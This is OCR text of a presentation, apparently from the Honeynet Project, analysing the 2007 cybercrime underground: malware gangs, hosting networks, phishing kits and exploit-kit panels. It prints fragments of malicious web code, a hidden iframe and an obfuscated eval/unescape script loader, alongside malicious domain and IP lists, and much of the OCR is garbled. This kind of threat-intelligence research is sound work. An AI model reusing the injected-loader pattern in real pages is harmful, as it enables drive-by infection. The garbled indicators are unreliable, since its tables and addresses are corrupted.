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— THE HON E Y N E T PROJ E C T — 


Who is Dancho Danchev? 


Independent Security 
Consultant - Before 


Cyber Threats Analyst - 
Nowadays 


Active Blogger Sa I 
(ddanchev.blogspot.c — 
Diverse background oe 
equals different 
perspective 
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Presentation Outline 


¢ Basics of OSINT and CYBERINT 

¢ Dynamics of the Underground Economy 
¢ Who's Who in Cybercrime for 2007? 

¢ Conclusion and Key Summary Points 
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What You Will Learn After This 
Presentation? 


¢ How powertul open source intelligence 
gathering techniques are for anticipating 
the emerging cyber threatscape 


An inside look at the Underground 
Economy with practical examples 

¢ Who were the main cyber crime groups in 
2007? 

Understand the difference between Cyber 
Crime 1.0 and today’s Cyber Crime 2.0 
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The Basics of OSINT/CYBERINT 


¢ What is OSINT and 
how important it is to 
fighting Cyber 
Crime? 

¢ Competitive 
Intelligence and 
OSINT 

¢ (CYBERINT) as the y 
convergence of Sd Oa tpn 
HUMINT, SIGINT 
and OSINT online 
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The Basics of OSINT/CYBERINT 


- Threat Intell Data Sources 


Publicly obtainable ° Hot Leads as 


Statistics Stepping Stones 
Real-time incident ° Subscriptions to 
response and Cyber Crime 
preservation of services newsletters 
actionable ¢ Keep you friends 
intelligence data close, the Cyber 
“Informants” and Criminals closer 


cyber buddies 
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The Basics of OSINT/CYBERINT 
- Threat Intell Data Sources 


Table 2-1. Primary open source media 


SYSTEM COMPONENTS ELEMENTS 


PUBLIC SPEARING 


FORMAT 


AUDIENCE 


GRAPHIC 


PUBLIC DOCUMENT. 


Sponsor 
Relationship 
Message 
Conference 
Debate 
Demonstration 
Lecture 

Fially 

Location 
Composition 
Drawing 
Engraving 
Painting 
Photegraph 

Print 

Compact Data Storage Device 
Digital Video Disk 
Hard Disk 

Tape 
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The Basics of OSINT/CYBERINT 
- Threat Intell Data Sources 


INTERNET SITES chat 
Email 
News 
COMMUNICATIONS Newsgroup 
Webcam 
Webcast 
Weblog 
COnUnience 
Education 
Sovenment 
Military 
Cnganizations 
Commerce 
INFORMATION Equacation 
(WEBPAGE CONTENT} + Government 


Military Organizations 


Dictionary 
Directory 


Downloads 


Transiation 
URL Lookup 
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The Basics of OSINT/CYBERINT 
- Cyber Intelligence Practices 


¢ Tactical Intelligence - “| Want to Know 
God's Thoughts, all Rest are Details” 
¢ consolidation of malicious parties 
¢ assessing their degree of collaboration 
¢ personalizing and profiling the groups 
¢ Scenario Building Intelligence - Devil's 
Advocate 
¢ Understanding of OPSEC 
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The Basics of OSINT/CYBERINT 
- Cyber Intelligence Practices 


¢ Operational Intelligence 


¢ real-time incident response as a window of 
opportunity 


¢ Official sites, underground forums, live 
exploit URLs, IPs, Netblocks - cross 
checking for malicious activity on multiple 
fronts = the entire criminal ecosystem is 
exposed 
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Dynamics of the Underground 
Econom 


¢ Do Socioeconomic or 
sociocultural factors 
drive the Criminal 
Underground? 

¢ Revenge is more 
powerful than Greed 

¢ Full scale capitalism, 


and microeconomic 
environment 
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Dynamics of the Underground 
Economy 


¢ Common business and 
market practices 


Consolidation 

¢ Vertical Integration 
¢ Benchmarking - QA 
otandartization 


Malicious Economies of 
Scale 


Maturity from Products 
to Services 
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Dynamics of the Underground 
Economy 
Customer Service, Manuals and Video Tutorials 


Promotions and Bargain deals with commodity 
services and products 


Exclusive, customer-tailored and proprietary 
tools/services 


Localization to break the entry barriers 
Risk-hedging and risk-forwarding 
Customization of products/services 


Botnets,Malware,Spamming,Phishing On 
Demand 
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Dynamics of the Underground 
Economy - 1000 Bots for $100 
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Dynamics of the Underground 
Economy - 1000 Bots for $100 
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Dynamics of the Underground 
Economy - Malware as a Web 
Service 


files to download data ? file extraction data ? 
server execution 
? ? ? ? ? 
i ele 
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Dynamics of the Underground 
Economy - Financial Liquidity is 


a Variable 


Advertised Price 
(in US Dollars) 


United States-based credit card with card verification value 
United Kingdom-based credit card with card verification value 


An identity {including US bank account, credit card, date of birth, and 
Fovernment issued identification number} 


List of 29,000 emails 

Online banking account with a $9,900 balance 

Yahoo Mail cookie exploit—advertised to facilitate full access when successful 
Valid Yahoo and Hotmail email cookies 

Com promised computer 

Phishing Web site hosting—per site 

Verified PayPal account with balance (balance varies) 

Unverified PayPal account with balance (balance varies) 

Skype account 

World of Warcraft account—one month duration 


Table 3. Advertised prices of Items traded on underground economy servers 
Source: Symantec Conara tian 


$1-$6 
$2-$12 
$14-$18 


$5 
$300 
$3 
$3 
$6-$20 
$3-5 
$50-$500 
$10-$50 
$12 
$10 


— THE HON E Y N E T PROJE CGC T — 


Who’s Who in Cyber Crime for 
2007? 
The Russian 


Business Network - a 
Powerhouse 


Riders on the Storm | 
Worm TAKE A BITE OUT OF 


New Media Malware 


Gang 
Ukrtelegroup Ltd 


The Rock Phishers 
Crowd 
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Who’s Who in Cyber Crime for 
20077? - The Russian Business 
Network 
¢ The proof that Cyber Crime cooperation has 

a long way to go 
¢ 100% operational, split on different netblocks 


¢ RBN IPs behind every high profile malware 
embedded attack in 2007 


¢ The Massive Malware Attack in Italy 
¢ Bank of India 


¢ Syrian Embassy in the U.K 
¢ Possibility Media's portfolio of E-zines 
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Who’s Who in Cyber Crime for 
2007? - The Russian Business 
Network 

¢ A connection between the RBN, Storm 

Worm and the New Media Malware Gang 

¢ Infrastructure as a service, revenue sharing 
on a bargain deal, or direct involvement 

¢ Each and every malware embedded attack 
assessment indicates they cooperate or 
have cooperated with each other 

¢ An underground ecosystem for hosting and 
dissemination of malware, attack kits and 
exploit URLs 
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Who’s Who in Cyber Crime for 

20077? - The Russian Business 
Network 

otarted issuing fake “account suspended 

notices” upon getting “blogosphered” 

The enemy you know is better than the 

enemy you don't know - no OPSEC policy 

Centralization => efficiency and easy of 

management => easy to block/traceback 


¢ Chasing down the RBN - how to breath 
down the RBN's neck? 
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Who’s Who in Cyber Crime for 
2007? - The RBN 


| 1 |adwareremoverzoo7com | v___ {203.121.7955 |203.117.175.116 |2os.1z.7955 | —|69.50.167.172 
| 2 [antispyzonecom |v __fas.255.118.i62 |195.3.100.7  |as.2ss.1z8162 | | 85.255.118.162 | 
| 4 |antiverminsernet_ | v_—_—fas.25s.119.66 |as.25s.19.66 _|a5.2ssi967 [aiss.asiss | 
| 5 |antiverminspronet_ |_v__—as.25s.119.66 |a5.255.19.66_|a5.255.a1967 [aiss.asies | 
| 6 |maiwarealarmcom | _v__—fai.29.209.38 |ai.20.209.38  |s195.140182 [203.121.7955 |69.50.167.172 _| 
| 8 |sigmacodebiz |x _—fo.t92.a06.2_|a5.255.117.205 |ort921061  [aiss.asig6 | 
| 9 |spyexebiz |v _|95.225.176.68 |195.225.176.68 |69.3193.162 _|195.225.176.76 _|195.225.176.68 _| 
sizo2e038 [assieais2 | |23.az.7e5s |69.50.167.172 | 
129.249.2008 [e1.29.240.208 |e1025072 | 69 50.167.172 | 


| 14 |thecleanersystem com 


virusburst.com 


[20 |windowsafesurtcom | 


Table 1. - Notes: 
1. Blacklisting for core IP address - ref: Spamhaus SBL, XBL 2007 rbnexploit.blogspot.com 


20 


o1.192.1062 [195.3147 |si95.145.186 |sits21061 | 
o1192.1062 [195.3147 |e195.145.186 |a5.255.114202 | 


irusprotectprobiz |x 
3 
| x ~~ {203.117.175.116 |203.117.175.116 |203.121.7955 | =| 203.117.175.116 


(all within McAfees Site Advisor as "Red X") 
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Who’s Who in Cyber Crime for 
2007? - The RBN 


| 21 |adprotectcom | VY [206.255.19074 |216.255.190.74 |207.226173114 | [216.255.190.74 | 

| 23 |antivirusgoldcom | x [207.226.17367 [69314282 °° | 

69.50.183.30 

vi fgiss.isa4a | [85.255.117.62 
OF 


e 


P| 
Fi 


8 


2 SS SSS a: 
: 69.50.160.60 |69.50.160.61 69.50.160.62 | sd 950.160.6 
30) |spyheal.com : : 


: : : “62 
y : To. f.. 21.79. 
203.121.79.55 
183. 
i FT? 2 : wal 


epywall.net 


i] 


69.50.160.61 


36 |thespyeguard.com x 


i 
y 


EpyWarequake.com 


4 
1 
1 
1 
1 
v 
1 
1 
1 


Lig | Lit 
Ba | ee 


9.50. 160.61 69.50.160.61 69.50. 160.62 


| 38 |virusrescuecom | 
| 39 [xmalwarestarmcom | x [203.117.175.116 [203.117.175.116 2031217955 | (69.50.267.172 | 
| 40 [xspy-shreddercom |v 203.121.79.55 | 203.117.175.116 ]203.1217955 | 6 9.50.267.172_| 


64.28.183.99 69.50.168.98 as2ssiizeo {| | | 
195.295.1777 _|69.50.182.20 69.50.183.26 69.50.182.92 69.50.183.30 


216.255.190.74 |216.255.190.74 |207.296.173.114 | | | 
6 , . Pd 9. 50.260.61 
66.29.15.144 69.50.182.20 69.50.183.26 69.50.182.22 66.29.15.141 

2 75, 121 


69.50.170.82 69.50.168.99 5.255.117.60 


Table 4. - Notes: 2007 rbnexploit.blogspot.com 
1. Blacklisting for core IP address - ref: Spamhaus SBL, XBL 
[all within McAfees Site Advisor as "Red ¥") 
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Who’s Who in Cyber Crime for 
2007? - The RBN 


Index of /ms 


Name Last modified Size Description 


- Parem Directory 


#) 001 exe 26-Feb-2007 20:10 45K 
2) 006.exr 28-Feb-2007 04:09 38K 
#) 01010101 exe 05-Mar-2007 11:47 28K 
2) Ol lex 28-Feb-2007 11:33 43K 
B) Lex 04-Jan-2007 18:59 8.1K 
'S) I.php O4-Dec-200600:36 23 
7 L rag 16-Jan-2007 16:59 37K 
B) 33.cxe 29.Mar-2007 1447 33K 
B) 101 exe 02-Jan-2007 17:32 42K 
B) 1303.cx 13-Mar-2007 05:49 17K 
2) 1 304 exe 16-Apr-2007 09:57 19K 
B) 171717 -instexe 05-Mar-2007 11:48 105K 
BE) 452225 exe 17-Feb-2007 08:36 9.4K 
2) 1663800.exr 16-Jan-2007 17:12 39K 
BH) 21212121 -instew 06-Mar-2007 11:53 105K 
Be) 27777777777777777 instexe 13-Mar-2007 14:27 105K 
5) iistaller.exe 12-Feb-2007 19:38 9.4K 
2) bhoexe 17-Apr-2007 10:02 230K 
z) bhob.exr 21-Nov-2006 22:41 51K 
2) blagod at? -inst.exe 29.Mar-2007 07:06 106K 
2) bot.exe 19-Sep-2006 18:32 69K 


2 het wil? 241 exe MA.Mar. 7 149? WK 
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Who’s Who in Cyber Crime for 
2007? - Stormy Wormy 


¢ Persistence, simplicity, and outdated 
vulnerabilities lead to the world’s largest 
botnet 


¢ Storm Worm is not an Attack, it’s a 
Campaign 

¢ Storm Worm is a Russian malware 
operation 
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Who’s Who in Cyber Crime for 
2007? - Stormy Wormy 


<Script Language="JavaScript*> function xor_str(plain_str, xor_key){ var xored_str = “"; 
for (var i = 6 ; i < plain_str-length; ++i) xored_ str += String.fromCharCode(xor_ke + 
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Who’s Who in Cyber Crime for 
2007? - Stormy Wormy 


¢ Storm Worm’s Fast-Flux Networks 
¢ bnably.com 
¢ wxtaste.com 
¢ snbane.com 
¢ tibeam.com 
¢* eqcorn.com 


¢ dropped domains as key fast-flux nodes 
before the “infrastructure” scaled enough 
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Who’s Who in Cyber Crime for 
2007? - Stormy Wormy 


Who’s Who in Cyber Crime for 
2007? - New Media Malware 
Gang 


¢ Domain farms of live exploit URLs, 
malware C&C 


¢ Have used and is still using RBN 
infrastructure 

¢ Connection with Storm Worm and several 
high profile malware embedded attacks 

¢ Same infrastructure is used by the RBN, 
storm Worm and the New Media Malware 
Gang 

¢ A Russian malware group 
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Who’s Who in Cyber Crime for 
2007? - New Media Malware 
Gang 
¢« The Gang speaks out - “get lost” and die() 

¢ Dots dots dots 


¢ musicbox1.cn/iframe.php refreshes 
textdesk.com - refreshing Storm Worm 
domains - eliteproject.cn; takenames.cn; 
blOcker.info; soace-sms.info 


¢ French government's Lybia site hack 
assessment ends up to 208./2.168.176 - 
the gang's main IP 


THE HON EY N E T PROJSEC T 


Who’s Who in Cyber Crime for 
2007? - New Media Malware 
Gang 
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66,30,243,216 


spl. vip-ddos.org 


a6.255. 74.242 akservers, colocation. ist.dcl Aost-88-255-74-24,.,  milkOsofk.com 
64.111,107.39 basic-vat. go, dreamhost, com apnea, health-hack, com 
194,95,203,118 | é-learningcenter. ru 
69,50,164.15 69,50. 164.13-custblock, intercage. com smnaturelife, corn 
66,.246,2399,97 st-97-259-246-66,2dayhost. com ‘ll-g. com 
#03.117,111,102 orentrafF.cn 

209, 160,28.70 rS2. juhost. ru 
203.117.111.106 trarFurl. ru 


oO Pray bed aera oe oo xox PU testers. x5Sx.6ru 
1 69,50.164,13 69,50, 164, 13-custblock, intercage. com honne-230¢. COM 
2 53.65,236.10 trFFc.org 
a 55,65, 296, 10 s051.net 
4 natural-amber corn 
5 1.177.16,30 grosha, majordona.ru jkh-novgorod. ru 
6 217,107.217.27 serverd, jing-net.ru lOcalhOsk, jino-net. ru 
? 61.9.5.95 meta, tomstudio. ru takbormi.ru 
a 116,0,105,11 Flashupdate. net 
1g 124.217.241.200 ns11.ipnames.net roilkiOsoFk, corm 
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Who’s Who in Cyber Crime for 
2007? - Ukrtelegroup Ltd 
Dispersed over several different netblocks 
- 88.255.114.*; 88.255.113.*; 88.255.94.*; 

88.255.120."; 

Huge farm for hosting malware, 
downloaders update locations, live exploit 
URLs, malware C&C 

Cooperation with the RBN, Storm Worm 
Campaigners and the New Media Malware 
Gang 

Known RBN customers using their 
services 


HON E Y N E T 


PROJECT 


Who’s Who in Cyber Crime for 


2007? - Ukrtelegroup Ltd 


Date Risk Origin §$Findings 

29,1,.2008 r, 18:23:03 wall — Trojan-Downloader,FlG, Trojan-Downloader, Win3S2.Small.cxx, Generic Downloader... 
29,1,2008 r, 10:09:11 wall | Trojan-Spy,Bankject, Trojan-Spy. Banker. EG] 

29,1,2008 r, 06:19:33 7 | 

278,1,2008 r, 04:01:14 7 

25,1,.2008 r, 16:52:26 wall —| Trojan-Downloader.F1G, Trojan-Downloader, Win32.Small.cxx, Generic Downloader.f.. 
25,1,2008 7, 13:25:31 wall —| Possible Mucrp-6, Trojan-Downloader.Fld, Trojan-Downloader, Win32, Smallcxx., 
25,.1,2008 7, 13:24:35 all Possible Mucrp-6 

24,1,2008 7, 22:17:39 wall Possible Mucrp-6 

23.1,2008 r, 02:03:55 all —| Possible Mucrp-6, Trojan-Downloadern.FlG, Generic Downloader... 

BE.12008 r, OF :42:36 wall Trojan-Downloader, Wins2, Small. bbw 

22,1,2008 7, OF 42:33 | 

227,1,2008 r, 06:00:10 3 

227,1,2008 r, 00:18:30 7 

20,1,2008 r, 12:28:32 wall Possible Mucrp-6 

18.1.2008 r, 01:53:40 wall Trojan-Downloader, Wins2.,Agent.hge, Trojan. Win32, Ghost aeq.,. 
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Who’s Who in Cyber Crime for 
2007? - Rock Phishers Crowd 


¢ Standardizing Phishing and Social 
Engineering 
Malicious Economies of Scale 
several different gangs 
¢ Rock Phishing’s a trend not a fad 
Static and descriptive structure 

¢ 209 Host Locked 

¢ 209.1 Host Locked 

¢ 66.1 Host Locked 


\€ dix ty me 
Name 
Barclays/ 

Cal xaPenedes / 


cpnl/ 


alliance-leicester/ 


bankofcyprus/ 


bankofscotland/ 


banorte/ 
bybank / 
cahoot/ 
cc-bank/ 


commbank / 


postbank / 
rasbank / 


rbsdiaital/ 


santander,/ 


coococeccoceecewocooooocececeo 


scotiabank/ 
0 un credit, 
ia woolwich/ 


Last moqgirtied 


21-Oct-2005 11: 
01-Mar-2006 19; 
01-Mar-2006 15: 
03-Mar-2006 11: 
08-Nov-2005 O65: 
03-Mar-2006 11: 
03-Mar-2006 00; 
28-Oct-2005 O06: 
31-May-2005 12: 
09-Mar-2006 20: 
09-Feb-2005 04: 
27-Oct-2005 12: 
28-Oct-2005 09: 
03-Mar-2006 11: 
03-Mar-2006 11: 
17-Jul-2005 11: 
29-Oct-2005 09: 
03-Mar-2006 11: 
12-Jan-2005 14: 
03-Nov-2005 11: 
03-Mar-2006 11: 
23-Oct-2005 06: 
09-Mar-2006 21: 
27-Oct-2005 11: 
03-Mar-2005 11: 
26-Feb-2005 02: 
26-Feb-2006 00: 
15-Sep-2005 13: 
17-Oct-2005 11: 


hitpogin internetbankingzone. biz! 


Ce eae 


hitp:Mogin.intemethbankingzone.bi2CaaPenedes/data tt 


Codi de client 1 nom d'usuari: 4132 


Clau d'entrada: 
Security: 1432 


Codi de client 1 nom d'usuari: 
test 


Clau d'entrada: 
Security: test 


4132 


Codi de client i nom d'usuari: 
pepito 


Clau d’entrada: 
Security: pepito 


Codi de client 1 nom d'usuari: 


Clau d‘entrada: 122455 


Security: 13345 


pepita 


502345 


Codi de client 1 nom d'usuari: jejeje. 


Clau d'entrada: dddddddddddd 


Clau d‘entrada: 
Security: test 


test 


di de client 1 nom d'usuari: 
pepito 


Co 
Clau d'’ entrada: 
Security: pepito 


Codi de client 1 nom d'usuari: 


Clau d'entrada: 122455 


Security: 13345 


Codi de client i nom d'usuari: 


Clau d'entrada: dddddddddddd 
Security: dddddddddddd 


jejeje... 
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. nadie pica! 


nadie pica! 
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Cyber Crime 1.0 and Cyber 
Crime 2.0 - DIY tools matured 
into Malware Kits 


arevyvoufearless.com — X 


IE Exploiter 


IE Exploiter - 
BY irk ‘@linuxmail.org) 


ExE File: 


Before we start please note that not all versions off Internet Explorer are vunverable to this | ~ 


Server Browse 
Finished Encoding 


Sa Sn nS En) Pe en 2 eS ee nS SS en Sn eS) Sen Serres 


Loaded 31700 of 31744 bytes... 
Hit ESC to cancel 


Encode Server Create Document 


http: //areyoufearless.com 


ss aoreeeanpcnnatnt nance Sabotage Help 
C3UW 36N 3g 6x1 
Internet Explorer 


ae ntto: //server.com/server. exe 
é http: //server.com/server.exe eR Oe 
Example : “http:/? /Server.exe 
Custom... edhitenliinfector 
ee haa 
————————eeeeeeeee 2 te ja, =. 
nz 


7 ee 


OCxM | roc3ax | KA 36<3HI i] 
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Cyber Crime 1.0 and Cyber 
Crime 2.0 - DIY tools matured 
_ Into Malware Kits 


ZIEPHORUS by PT EM -, "4 


Hj 


A ep ay US), Oem fp 
{ \ 140 Load here the application to execute Load Server b a i Ha — 


— = JES \ Use Default Page [. Make an HEX copy 
} Hitt Ld HAN. myserver. here/test.mp3 = 


r N 
‘ \ [choose here your local steel for package Output Folde| oa : Server ICQ notify a 
—"= Ey, [_ Startup Method SysHorton 


Ta smart path checking lv jj 
additional custom path [ s Mf 


Was Exec Delay (ms])5000 
r 


Denial of Service 


Fake window :-] 


‘bi ea 
‘enti ee \ 


4 peuerate: 
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Cyber Crime 1.0 and Cyber 
Crime 2.0 - DIY tools matured 
into Malware Kits 
¢ Rootlauncher Kit, WebAttacker, Mpack, 
IcePack, Zunker, Pinch, Apophis, Fire 

Pack, Advanced Pack, Nuclear Malware 
Kit, Metaphisher Banker Kit, Nuclear 
Grabber - the list is endless 


¢ Modularity, Open Source, Localization, 
“Add an exploit’ DIY customization 
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Cyber Crime 1.0 and Cyber 
Crime 2.0 - DIY tools matured 
into Malware Kits 


SEER ECS EE 


ly Level O 


<iframe src=" index. php” width="0"° height="0"></iframe> 


> 


<script language="JavaScript”> eval (unescape (" document. write¥%28String. fromCharCode% 
2860%2C 105%2C102%2C 1 14%2C9TH2C 109%2C 101% 2C32%2011582C 1 148 2C99%2C61N2C54%2C 119%2C119% 
20 119%2C53%2C4 6% 2C 104% 2C9TH2C99%2C 10 T#%2C 101%2C114%2C111%2C111%2C46%2C099%2C111%2C109% 
2C4 TH2C 105% 2C99%2C 101% 2C4 7H2C 1 05%2C 1 10%2C100%2C1018%2C 120%2C46%2C 112%2C 104%2C112%2C54% >| 
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Cyber Crime 1.0 and Cyber 
Crime 2.0 - DIY tools matured 
into Malware Kits 


a hase ) . 
THE) 8) SBa) head Tam Fea he 
“ee x) (2) yr wat 

=|] #2 


Hitt ©) [B) netp: // 


ARSS- 3881/6) BHA: 8-Aug-2007 18:04:10 
35 (China) 


IE XP ALL 
Win2000 


Firefox 


(c) 2007 ee AEN. 
MPack@k AH 18 AiAaea BARBS» MRTG AR LEE 7 BRAEMAR ES, PASH. Bhs a 
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Cyber Crime 1.0 and Cyber 
Crime 2.0 - DIY tools matured 


into Malware Kits 
% 


Web-Attacker (ILQ604) contig editor 


Enter here am URL path for CG]-script on your server 


nttp EWN. roUrToSst.Com/ Corbin leOGOH i Please enter the password to access the administration panel 


Enter here the Folder name for placing an output exploit components 
Web-Panel password : admin Enter 


[ c:\e0604\Output 


| 7 | Cancel | 
(co) by Imet-Lum Team ( hbbps ty : }, 2006 


Total number of installed unique launchers is: 1013 
Regstered bo ID 123445Co 


Authorization Required 


Username! 
Password,| OK | 
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Ckpunt Ana y4uetTa Tpapuka 


A AMMHUCTpaTHpOBaHve CTaTHCTHKH No 3arpy3kam C TpaduKa 


a )[ Aspicn | 
naponb |[ Ho6asutb nonbsoBaTena | 
[ Nomomp |[ Beixos | 


Cratuctuka no Tpaduny 
Bepcuu 6Opaysepos Obuynu TpapuK 


Firefox ; : }Ce HOCTbI 
MSIE : : YHuKaNbHbIe NOceTHTeNv 
Opera 


other 


NonbiToK NOBTOpHore npocmotpa [Sabanennpie] 


CtTatTuctnhka no 3ar pyske Bawen NporpamMmobi 


JapaxeHHbie MawvHb! [Bcero] JapaxeHHbie mawvHbi [3a cyTKK] 


Japa xeHHbie Ip 600 id JaPpaMenHbie Ip 


Pacuet npobusaenor TH SKCHNOKTOB 


CymmapHan npo6uBaemoctTb 3KCNNOKTOB no Bcem Windows cuctemam: 


(a 3apaxKeHH NO ONeEPpalVMOHHbin CucTeMaM 
IKCNNOKT 3agevcTBOBaH: [| ] paz 


Onepat IAGHHbIEe CKHCTEMb! 


Windows 2000 
other 


4 j b j Windows 2000 
Windows 9B: . 


peas [(geor= ae] (| 


T HE 


Fiesize(ann vem) Fle mecttied (51) 


Test 


Save to Tachs 


Porsayg torks. 


5 BB cee tom tt 


I Gira ri es | foe 13) 
EZ teat | emit 


pce08 FD unicaja | form tt 


ALAN ALAR AL ARS AU ART An Al 


b 
b 
» 
b 
b 
b 
b 
b 
b 
b 
b 
ig 
> 
b 


A AL AL A 


& 03808 


Welcome, toot 


mo Fido 


 caiewcwsthrya| tomtct 
ZX Firat | teens 
Enon) | tomes 

E cee2iiomts 
ran) const 

@ costert|tombt 

EB teneste | emit 
ent i fcen it 


gsce08 GB abber| tomts 


Cry ca) | form tst 


5? jon cer 


HON EY N CE T PROJECT 


T HE H ON E Y N CE T PROJECT 


CTATMCTUKA 


Cratuctnka [ STATISTICS ][ BROWSERS ][ IP'S ] [ CONFIG ] [ CLEANUP ] 


{Toro Bpaysepe! OCH CTPaHbl 


Ctrpana 3anpocos Npobusos 
GERMANY 39 4 (10.26%) 
UNITED STATES 130 8 (6.15% 
POLAND 138 16 (11,59%) 
LITHUANIA 1 0(0.0 


nia 117 11 (9.40%) 
SPAIN 26 5 (19.23%) 
AUSTRIA 3 0 (0,0 
CANADA 12 3 (25.00 
NORWAY 20 1(5 
AUSTRALIA 14 0(0.0 
RUSSIAN FEDERATION 13 7 (53 

J&P AN 4 oO 
UNITED KINGDOM 2? 1(3 
SWEDEN 5 o(o 
TURKEY ; 3 


a} 
ay ee 


FRANCE 

EL SALVADOR 
LATVIA 
COLOMBIA, 
ROMANIA 
DENMARK 
NEW ZEALAND 
AZERBAIJAN 
LUXEMBOURG 
C¥PRUS 
MEXICO 
FINLAND 
JORDAN 
ITALY - 
NETHERLANDS ‘a 
CHILE ; 


_ 
= <S 
oO 
oO 


oN — — = 


Ww 


= OW | = = 
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Conclusion and Key Summary 
Points 


It's all a matter of perspective 
¢ How deep you really wanna go? 


Personal efforts expand the entire 
ecosystem 


¢ Cyber Criminals are lazy 
¢ Keep it Simple Stupid (KISS) pragmatic 
Cyber Crime 


Assess the final product or infiltrate the 
assembly line? 


— THE HON EY N E T PROJ E CGC T — 


Conclusion and Key Summary 
Points 


¢ OSINT through Botnets 

¢ Corporate Espionage through Botnets 

¢ Asymmetric Warfare on Demand 

¢ Cyber Crime is outsourceable 

¢ Cyber Crime Powerhouses outpace 
boutique cyber crime operations 


¢ Cyber Crime - a HR pool for cyber warfare 
talent - FAPSI 
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Conclusion and Key Summary 
Points 


It's Alla Matter of Perspective 


Somewhere in Eastern Europe At a bored plastic surgeon's mansion |In a “hacker recruitment" basement 


i What?! | Outrageous, but Siorkare If only he It has come to our 
Can you believe Someone's knowing it's teens have knew that attention that you're 


pega disrespecting without girlfriends infected half the quite talanted for a 

450, sles | ; = ala | 
ese orl Lenin's idea for behind this, Iknow my |] uae 7 0,000 world's intel || cybercriminal Andrei. 
¥ equal distribution money are safe, sites fr Italy agencies Congrats, as of today 


single donation in of income? " “all 
John Doe's entire |} "proceed" with his Yes honey, our, causing outsource to |} you serve the family 
ifatime? financiai.” us and will code malware 
lifetime: bank accounts aaa, your oe ihe 
Boris. money are safe, ¥ 


wuw.stripgenerator.com 


ddanchev.stripgenerator.com 
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Conclusion and Key Summary 
Points 


http://ddanchev.blogspot.com - 
switchboard to real-time and historical 
threat Intell 


¢ dancho.danchev@gmail.com 


Thank you for your time and 
attention! 


